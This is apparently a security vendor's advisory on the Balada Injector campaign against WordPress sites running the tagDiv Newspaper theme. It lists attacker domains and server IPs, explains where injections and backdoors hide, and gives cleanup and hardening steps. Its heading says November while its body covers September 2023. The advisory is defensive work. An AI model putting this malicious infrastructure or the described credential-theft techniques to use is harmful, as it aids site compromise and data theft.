Balada Injector infrastructure: November 2023

Here are the main Balada Injector domains and IP addresses observed during the month of September, 2023 — some of which were also used in attacks not directly related to the Newspaper theme.

Balada Injector Domains:

• decentralappps[.]com
• statisticscripts[.]com
• dataofpages[.]com
• listwithstats[.]com
• promsmotion[.]com
• stablelightway[.]com
• specialtaskevents[.]com
• getmygateway[.]com
• stratosbody[.]com
• specialnewspaper[.]com (note the Newspaper in the domain name)

For a short period of time, Balada Injector was hiding some of their servers behind a CloudFlare firewall, but their domains didn’t last long there. They inevitably had to return back to pointing domains back directly to their own servers.

Balada Injector Server IPs:

• 2.59.222.113
• 2.59.222.119
• 2.59.222.121
• 2.59.222.122
• 2.59.222.158
• 185.39.206.158
• 185.39.206.159
• 185.39.206.160
• 185.39.206.161
• 80.66.79.252
• 80.66.79.253
• 88.151.192.253
• 88.151.192.254
• 89.23.103.32
• 89.23.103.246

Mitigation steps

September, 2023 was one of the busiest months for Balada Injector malware. Our SiteCheck remote website scanner detected various types of Balada Injector on over 17,000 websites — almost twice the number of detections in the previous month of August. Over 9,000 of these detections were related to the Newspaper theme vulnerability.

We observed a rapid cycle of modifications to their injected scripts alongside new techniques and approaches. We saw randomized injections and obfuscation types, simultaneous use of multiple domains and subdomains, abuse of CloudFlare, and multiple approaches to attack administrators of infected WordPress sites.

September was also a very challenging month for thousands of users of the tagDiv Newspaper theme. The Balada Injector malware campaign performed a series of attacks targeting both the vulnerability in the tagDiv Composer plugin and blog administrators of already infected sites.

Our advice to users of the Newspaper theme is to follow these steps:

1. Scan your site and remove all injected Balada malware. Our SiteCheck scanner detects most Balada Injector variations as malware.injection?35.*. If you continue with the following steps before completely removing the malware, it may reinfect your site while you are logged in as an administrator.
   • Remove the initial injection, which can be found in the “td_live_css_local_storage” option in the wp_options table.
   • Remove secondary injections, which can be found at the top of .js files like /wp-includes/js/jquery/jquery-migrate.min.js,  /wp-includes/js/jquery/jquery.min.js and /wp-includes/js/wp-emoji-release.min.js.
   • Check files like index.php, wp-blog-header.php  and your theme’s header.php and footer.php files for injections. Remove any malicious code you find there.
2. Make sure that the tagDiv Composer plugin is patched to at least version 4.2. This will help to prevent reinfections via the known security vulnerability.
3. Keep your Newspaper theme updated with the latest patches. We’ve seen these injections on sites that use various different versions of the Newspaper themes: 10.x, 11.x, 12.x. Some were as old as version 8.x.
4. Make sure all other themes and plugins are up-to-date. This is a security best practice and will help protect your website from known vulnerabilities and software bugs.
5. Remove all unwanted admin users. Check for any recently created admins, especially if their usernames are “greeceman” or end with “mann” and they use “@mail.com” emails.
6. Make sure there are no unwanted plugins such as wp-zexit or wp-swamp installed on your site. Remember, by default such plugins hide themselves in the WordPress admin interface, so make sure to actually check what kind of plugins you have in the wp-content/plugins directory.
7. Check the 404.php file of the Newspaper theme. There may be a backdoor there.
8. Scan your entire website for backdoors. It’s not uncommon for the Balada injector and other attacks to use the initial backdoor to upload several other backdoors into random files. Integrity control systems may help notice new and modified files.
9. Change all of your website passwords, including the database password. Balada Injector is known for stealing information from wp-config.php files. Make sure all of your user credentials are strong, unique and secure to help prevent reinfection.

Now after reading how website malware may target WordPress admins to escalate some minor injection into the whole site take over, let’s revisit some security practices specifically for WordPress administrators.

• Even though WordPress admins can post articles, please use your admin account only for administrative tasks. Use more appropriate roles such as author, contributor and editor to create, edit, and post content instead.
• If you logged as a WordPress administrator, try not to browse your own website in the same browser before you log out. Balada injector uses this scenario to make site admins further infect their own sites. If you need to test site pages, consider using a different browser or a private/incognito window of the same browser, where you will navigate without being identified as a site administrator.
• If you don’t normally edit theme and plugin files, please disable the theme and plugin editors in the WordPress admin interface.